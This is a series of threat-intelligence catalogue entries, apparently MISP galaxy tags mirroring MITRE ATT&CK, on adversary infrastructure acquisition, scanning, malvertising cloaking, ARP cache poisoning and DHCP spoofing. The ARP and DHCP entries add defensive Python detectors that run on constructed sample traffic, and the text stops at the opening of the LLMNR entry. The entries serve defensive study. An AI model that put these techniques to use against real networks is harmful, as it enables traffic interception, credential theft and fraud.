Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.<sup>[[Norton Botnet](https://app.tidalcyber.com/references/f97427f1-ea16-4e92-a4a2-4d62a800df15)]</sup> Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or Distributed Denial of Service (DDoS).<sup>[[Imperva DDoS for Hire](https://app.tidalcyber.com/references/86f87ec6-058e-45a7-9314-0579a2b4e8f2)]</sup><sup>[[Krebs-Anna](https://app.tidalcyber.com/references/028b7582-be46-4642-9e36-b781cac66340)]</sup><sup>[[Krebs-Bazaar](https://app.tidalcyber.com/references/b46efda2-18e0-451e-b945-28421c2d5274)]</sup><sup>[[Krebs-Booter](https://app.tidalcyber.com/references/d29a88ae-273b-439e-8808-dc9931f1ff72)]</sup>

The tag is: misp-galaxy:technique="Botnet - Duplicate"

DNS Server

Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://app.tidalcyber.com/technique/8a7afe43-b814-41b3-8bd8-e1301b8ba5b4)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.

By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://app.tidalcyber.com/technique/5c6c3492-5dbc-43ee-a3f2-ba1976d3b379)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.<sup>[[Unit42 DNS Mar 2019](https://app.tidalcyber.com/references/e41fde80-5ced-4f66-9852-392d1ef79520)]</sup>

The tag is: misp-galaxy:technique="DNS Server"

Domains - Duplicate

Adversaries may acquire domains that can be used during targeting. Domain names are the human-readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.

Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), and Command and Control.<sup>[[CISA MSS Sep 2020](https://app.tidalcyber.com/references/ffe613e3-b528-42bf-81d5-4d8de38b3457)]</sup> Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).<sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup><sup>[[PaypalScam](https://app.tidalcyber.com/references/bcea7897-6cb2-467d-ad3b-ffd20badf19f)]</sup> Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.<sup>[[CISA IDN ST05-016](https://app.tidalcyber.com/references/3cc2c996-10e9-4e25-999c-21dc2c69e4af)]</sup><sup>[[tt_httrack_fake_domains](https://app.tidalcyber.com/references/9bdda422-dbf7-4b70-a7b1-9e3ad658c239)]</sup><sup>[[tt_obliqueRAT](https://app.tidalcyber.com/references/be1e3092-1981-457b-ae76-b55b057e1d73)]</sup><sup>[[httrack_unhcr](https://app.tidalcyber.com/references/a4a3fd3d-1c13-40e5-b462-fa69a1861986)]</sup><sup>[[lazgroup_idn_phishing](https://app.tidalcyber.com/references/83de363d-b575-4851-9c2d-a78f504cf754)]</sup>

Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.<sup>[[Categorisation_not_boundary](https://app.tidalcyber.com/references/3c320f38-e691-46f7-a20d-58b024ea2fa2)]</sup><sup>[[Domain_Steal_CC](https://app.tidalcyber.com/references/30ab5d35-db9b-401f-89cb-73f2c7fea060)]</sup><sup>[[Redirectors_Domain_Fronting](https://app.tidalcyber.com/references/42c81d97-b6ee-458e-bff3-e8c4de882cd6)]</sup><sup>[[bypass_webproxy_filtering](https://app.tidalcyber.com/references/fab84597-99a0-4560-8c8c-11fd8c01d5fa)]</sup>

Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than that of the domain’s owner. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:technique="Domains - Duplicate"

Malvertising

Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.<sup>[[spamhaus-malvertising](https://app.tidalcyber.com/references/15a4d429-28c3-52be-aeb8-d94ad2743866)]</sup> Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites.

Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad, which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.<sup>[[Masquerads-Guardio](https://app.tidalcyber.com/references/e11492f4-f9a3-5489-b2bb-a28b19ef88b5)]</sup><sup>[[FBI-search](https://app.tidalcyber.com/references/deea5b42-bfab-50af-8d85-cc04fd317a82)]</sup> Adversaries’ efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.<sup>[[sentinelone-malvertising](https://app.tidalcyber.com/references/7989f0de-90b8-5e6d-bc20-1764610d1568)]</sup>

Malvertising may be used to support [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5) and [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system’s web browser.<sup>[[BBC-malvertising](https://app.tidalcyber.com/references/425775e4-2948-5a73-a2d8-9a3edca74b1b)]</sup>

Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.<sup>[[Masquerads-Guardio](https://app.tidalcyber.com/references/e11492f4-f9a3-5489-b2bb-a28b19ef88b5)]</sup> Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.<sup>[[spamhaus-malvertising](https://app.tidalcyber.com/references/15a4d429-28c3-52be-aeb8-d94ad2743866)]</sup>

The tag is: misp-galaxy:technique="Malvertising"

Server - Duplicate

Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support watering hole operations, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or email servers to support [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) operations. Instead of compromising a third-party [Server](https://app.tidalcyber.com/technique/ce71e252-3403-4287-a0b5-9328fa88af96) or renting a [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23), adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Alternatively, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.<sup>[[NYTStuxnet](https://app.tidalcyber.com/references/38b0cf78-88d0-487f-b2b0-81264f457dd0)]</sup>

The tag is: misp-galaxy:technique="Server - Duplicate"

Serverless - Duplicate

Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) traffic to an adversary-owned command and control server.<sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup><sup>[[AWS Lambda Redirector](https://app.tidalcyber.com/references/9ba87a5d-a140-4959-9905-c4a80e684d56)]</sup> As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.<sup>[[Detecting Command & Control in the Cloud](https://app.tidalcyber.com/references/b12e0288-48cd-46ec-8305-0f4d050782f2)]</sup><sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup>

The tag is: misp-galaxy:technique="Serverless - Duplicate"

Virtual Private Server - Duplicate

Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. A variety of cloud service providers sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.

Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.<sup>[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)]</sup>

The tag is: misp-galaxy:technique="Virtual Private Server - Duplicate"

Web Services - Duplicate

Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)), [Exfiltration Over Web Service](https://app.tidalcyber.com/technique/66768217-acdd-4b52-902f-e29483630ad6), or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

The tag is: misp-galaxy:technique="Web Services - Duplicate"

Acquire Infrastructure

Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.<sup>[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)]</sup> Additionally, botnets are available for rent or purchase.

Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b), including from residential proxy services.<sup>[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)]</sup><sup>[[FBI Proxies Credential Stuffing](https://app.tidalcyber.com/references/17f9b7b0-3e1a-5d75-9030-da79fcccdb49)]</sup><sup>[[Mandiant APT29 Microsoft 365 2022](https://app.tidalcyber.com/references/e141408e-d22b-58e4-884f-0cbff25444da)]</sup> Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

The tag is: misp-galaxy:technique="Acquire Infrastructure"

Scanning IP Blocks

Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.

Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://app.tidalcyber.com/technique/58776ca9-0c54-487f-afcc-e7e5b661bd54), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.<sup>[[Botnet Scan](https://app.tidalcyber.com/references/ca09941c-fcc8-460b-8b02-d1608a7d3813)]</sup> Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Scanning IP Blocks"

Vulnerability Scanning

Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.

These scans may also include broader attempts to [Gather Victim Host Information](https://app.tidalcyber.com/technique/4acf57da-73c1-4555-a86a-38ea4a8b962d) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.<sup>[[OWASP Vuln Scanning](https://app.tidalcyber.com/references/039c0947-1976-4eb8-bb26-4c74dceea7f0)]</sup> Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).

The tag is: misp-galaxy:technique="Vulnerability Scanning"

Wordlist Scanning

Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://app.tidalcyber.com/technique/e55d2e4b-07d8-4c22-b543-c187be320578), or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).

For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.<sup>[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]</sup> This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a) or [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c)).

As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.<sup>[[S3Recon GitHub](https://app.tidalcyber.com/references/803c51be-a54e-4fab-8ea0-c6bef18e84d3)]</sup><sup>[[GCPBucketBrute](https://app.tidalcyber.com/references/d956e1f6-37ca-4352-b275-84c174888b88)]</sup> Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://app.tidalcyber.com/technique/77069b3f-9e42-4f1b-894f-8df568233df2) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally.

The tag is: misp-galaxy:technique="Wordlist Scanning"

Active Scanning

Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.<sup>[[Botnet Scan](https://app.tidalcyber.com/references/ca09941c-fcc8-460b-8b02-d1608a7d3813)]</sup><sup>[[OWASP Fingerprinting](https://app.tidalcyber.com/references/ec89a48b-3b00-4928-8450-d2fbd307817f)]</sup> Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).

The tag is: misp-galaxy:technique="Active Scanning"

ARP Cache Poisoning

Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) or [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243).

The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.<sup>[[RFC826 ARP](https://app.tidalcyber.com/references/8eef2b68-f932-4cba-8646-bff9a7848532)]</sup> Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use that information and store it in its ARP cache.

An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.

The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.<sup>[[Sans ARP Spoofing Aug 2003](https://app.tidalcyber.com/references/1f9f5bfc-c044-4046-8586-39163a305c1e)]</sup><sup>[[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]</sup>

Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.<sup>[[Sans ARP Spoofing Aug 2003](https://app.tidalcyber.com/references/1f9f5bfc-c044-4046-8586-39163a305c1e)]</sup>
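The resolution exchange described above, seen from the defender's side as an added example that is not part of the galaxy or the ATT&CK text: it decodes raw Ethernet/ARP frames (for instance read from a pcap) and raises the alerts an ARP monitor such as arpwatch would, namely a changed IP-to-MAC binding, a broadcast or self-addressed (gratuitous) reply, and a reply whose Ethernet source differs from its ARP sender field. The frames, hosts and addresses are constructed sample data.

```python
"""Watch ARP replies for changed IP-to-MAC bindings and unsolicited announcements.

Added example, not part of the MISP galaxy or ATT&CK text: the checks an ARP
monitor such as arpwatch performs, applied to raw Ethernet frames (for
instance read from a pcap). The frames and addresses below are constructed.
"""
import struct

ETH = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))


def ip_bytes(text):
    return bytes(int(x) for x in text.split("."))


def parse_arp(frame):
    """Decode an Ethernet II frame carrying IPv4-over-Ethernet ARP, else None."""
    if len(frame) < ETH.size + ARP.size:
        return None
    eth_dst, eth_src, ethertype = ETH.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = ARP.unpack_from(frame, ETH.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_dst": mac_str(eth_dst), "eth_src": mac_str(eth_src), "oper": oper,
            "sha": mac_str(sha), "spa": ip_str(spa), "tha": mac_str(tha), "tpa": ip_str(tpa)}


class ArpWatcher:
    """Tracks the IP -> MAC bindings seen in ARP replies and reports anomalies."""

    def __init__(self):
        self.bindings = {}  # sender IP -> MAC that first claimed it

    def process(self, frame):
        """Return alert strings for one frame (empty list if nothing is notable)."""
        pkt = parse_arp(frame)
        if pkt is None or pkt["oper"] != ARP_REPLY:
            return []
        alerts = []
        # A normal stack puts its own MAC in both the Ethernet header and the ARP
        # sender field; a difference points at a crafted frame.
        if pkt["eth_src"] != pkt["sha"]:
            alerts.append(f"header mismatch: frame from {pkt['eth_src']} carries sender {pkt['sha']}")
        # Replies are normally unicast to the requester. A broadcast reply, or one
        # whose sender and target IP are equal, is a gratuitous announcement.
        if pkt["eth_dst"] == BROADCAST or pkt["spa"] == pkt["tpa"]:
            alerts.append(f"gratuitous reply: {pkt['sha']} announces {pkt['spa']}")
        # The first MAC seen for an IP is the baseline; a second claimant is either
        # a legitimate re-addressing or a poisoning attempt, so it is reported.
        known = self.bindings.setdefault(pkt["spa"], pkt["sha"])
        if known != pkt["sha"]:
            alerts.append(f"binding change: {pkt['spa']} was {known}, now claimed by {pkt['sha']}")
        return alerts


def build_arp(oper, sha, spa, tha, tpa, eth_dst=None, eth_src=None):
    """Assemble an Ethernet + ARP frame (constructed sample data for the demo)."""
    eth = ETH.pack(mac_bytes(eth_dst or tha), mac_bytes(eth_src or sha), ETHERTYPE_ARP)
    return eth + ARP.pack(1, 0x0800, 6, 4, oper, mac_bytes(sha), ip_bytes(spa),
                          mac_bytes(tha), ip_bytes(tpa))


GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "aa:bb:cc:dd:ee:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.20", "aa:bb:cc:dd:ee:20"
ROGUE_MAC, ZERO_MAC = "de:ad:be:ef:00:01", "00:00:00:00:00:00"
SAMPLE_FRAMES = [
    build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, ZERO_MAC, GATEWAY_IP, eth_dst=BROADCAST),
    build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),  # legitimate answer
    build_arp(ARP_REPLY, ROGUE_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),    # second host claims the gateway IP
    build_arp(ARP_REPLY, ROGUE_MAC, GATEWAY_IP, ZERO_MAC, GATEWAY_IP, eth_dst=BROADCAST),  # gratuitous
    build_arp(ARP_REPLY, ROGUE_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP, eth_src="de:ad:be:ef:00:02"),
]


def run_demo(frames=SAMPLE_FRAMES):
    """Feed the sample frames through one watcher; returns the alert list per frame."""
    watcher = ArpWatcher()
    return [watcher.process(f) for f in frames]
```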

The tag is: misp-galaxy:technique="ARP Cache Poisoning"

DHCP Spoofing

Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) or [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243).

DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.<sup>[[rfc2131](https://app.tidalcyber.com/references/b16bd2d5-162b-44cb-a812-7becd6684021)]</sup> The typical server-client interaction is as follows:

  1. The client broadcasts a DISCOVER message.

  2. The server responds with an OFFER message, which includes an available network address.

  3. The client broadcasts a REQUEST message, which includes the network address offered.

  4. The server acknowledges with an ACK message and the client receives the network configuration parameters.

Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.<sup>[[new_rogue_DHCP_serv_malware](https://app.tidalcyber.com/references/8e0a8a9a-9b1f-4141-b595-80b98daf6b68)]</sup><sup>[[w32.tidserv.g](https://app.tidalcyber.com/references/9d4ac51b-d870-43e8-bc6f-d7159343b00c)]</sup> Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.

DHCPv6 clients can receive network configuration information without being assigned an IP address by sending an <code>INFORMATION-REQUEST (code 11)</code> message to the <code>All_DHCP_Relay_Agents_and_Servers</code> multicast address.<sup>[[rfc3315](https://app.tidalcyber.com/references/9349f864-79e9-4481-ad77-44099621795a)]</sup> Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.

Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e., [Service Exhaustion Flood](https://app.tidalcyber.com/technique/03619027-8a54-4cb2-8f1d-38d476edbdd8)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool.
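
The DISCOVER/OFFER/REQUEST/ACK exchange above gives a defender two things to check: every OFFER or ACK should carry the Server Identifier of a known server and hand out the expected DNS servers, and the number of distinct clients sending DISCOVER should stay within what the segment can hold. The following is an added example, not code from the MISP galaxy entry; the messages are a constructed, simplified view of DHCP packets, and the authorized-server set, expected DNS set and exhaustion threshold are site-specific assumptions.

```python
"""Added example (not from the MISP galaxy entry): audit DHCP traffic for a
rogue server and for pool exhaustion, following the DISCOVER/OFFER/REQUEST/ACK
exchange described above.

Messages are a constructed, simplified view of DHCP packets. The authorized
server list and expected DNS servers are site-specific assumptions.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class DhcpMessage:
    kind: str                   # DISCOVER, OFFER, REQUEST or ACK
    client_mac: str
    server_id: str = ""         # option 54 (Server Identifier); empty in client messages
    offered_ip: str = ""
    dns_servers: tuple = ()     # option 6 as handed out in OFFER/ACK


def audit_dhcp(messages, authorized_servers, expected_dns, exhaustion_threshold=50):
    """Return alerts for server messages from unknown servers, unexpected DNS
    settings, and an unusual number of distinct DISCOVER clients."""
    alerts = []
    discover_clients = set()
    for m in messages:
        if m.kind == "DISCOVER":
            discover_clients.add(m.client_mac)
            continue
        if m.kind not in ("OFFER", "ACK"):
            continue
        if m.server_id not in authorized_servers:
            alerts.append(f"rogue {m.kind} from {m.server_id} to {m.client_mac}")
        bad_dns = [d for d in m.dns_servers if d not in expected_dns]
        if bad_dns:
            alerts.append(f"unexpected DNS {bad_dns} in {m.kind} from {m.server_id}")
    if len(discover_clients) >= exhaustion_threshold:
        alerts.append(f"possible pool exhaustion: {len(discover_clients)} distinct DISCOVER clients")
    return alerts


AUTHORIZED = {"10.0.0.1"}        # assumption: the only legitimate DHCP server
EXPECTED_DNS = {"10.0.0.53"}     # assumption: the only resolver clients should receive

# Constructed: one legitimate exchange, plus a competing OFFER for the same
# client from an unlisted server that hands out an outside DNS resolver.
SAMPLE_TRAFFIC = [
    DhcpMessage("DISCOVER", "02:00:00:00:00:05"),
    DhcpMessage("OFFER", "02:00:00:00:00:05", "10.0.0.1", "10.0.0.105", ("10.0.0.53",)),
    DhcpMessage("OFFER", "02:00:00:00:00:05", "10.0.0.66", "10.0.0.200", ("203.0.113.9",)),
    DhcpMessage("REQUEST", "02:00:00:00:00:05", "10.0.0.1", "10.0.0.105"),
    DhcpMessage("ACK", "02:00:00:00:00:05", "10.0.0.1", "10.0.0.105", ("10.0.0.53",)),
]

# Constructed: 60 DISCOVERs, each from a different MAC, and nothing else.
FLOOD_TRAFFIC = [
    DhcpMessage("DISCOVER", f"02:00:00:00:{i // 256:02x}:{i % 256:02x}") for i in range(60)
]

if __name__ == "__main__":
    for a in audit_dhcp(SAMPLE_TRAFFIC, AUTHORIZED, EXPECTED_DNS):
        print(a)
    for a in audit_dhcp(FLOOD_TRAFFIC, AUTHORIZED, EXPECTED_DNS):
        print(a)
```

Switch-side DHCP snooping enforces the same idea at the port level (only trusted ports may send OFFER/ACK); the code above is the analysis-time equivalent for environments where that feature is unavailable or where its logs need corroboration.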

The tag is: misp-galaxy:technique="DHCP Spoofing"

LLMNR/NBT-NS Poisoning and SMB Relay

By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.

